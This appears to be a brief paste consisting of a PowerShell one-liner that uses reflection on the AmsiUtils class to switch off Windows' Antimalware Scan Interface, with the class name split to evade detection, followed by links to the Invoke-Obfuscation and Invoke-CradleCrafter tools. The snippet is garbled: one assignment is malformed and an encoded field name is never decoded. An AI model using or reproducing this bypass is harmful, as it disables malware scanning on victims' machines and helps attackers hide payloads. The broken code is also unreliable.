$a =[Ref].Assembly.GetType('System.Management.Automation.Ams' + 'iUtils') $h="4456625220575263174452554847" $s =string-replace " " $b =$a.GetField($s,'NonPublic,Static') $b.SetValue($null,$true)
https://github.com/danielbohannon/Invoke-Obfuscation
https://github.com/danielbohannon/Invoke-CradleCrafter
Invoke-CradleCrafter exists to aid Blue Teams and Red Teams in easily exploring, generating and obfuscating PowerShell remote download cradles. In addition, it helps Blue Teams test the effectiveness of detections that may work for output produced by Invoke-Obfuscation but may fall short when dealing with Invoke-CradleCrafter since it does not contain any string concatenations, encodings, tick marks, type casting, etc.
https://www.youtube.com/watch?v=Nn9yJjFGXU0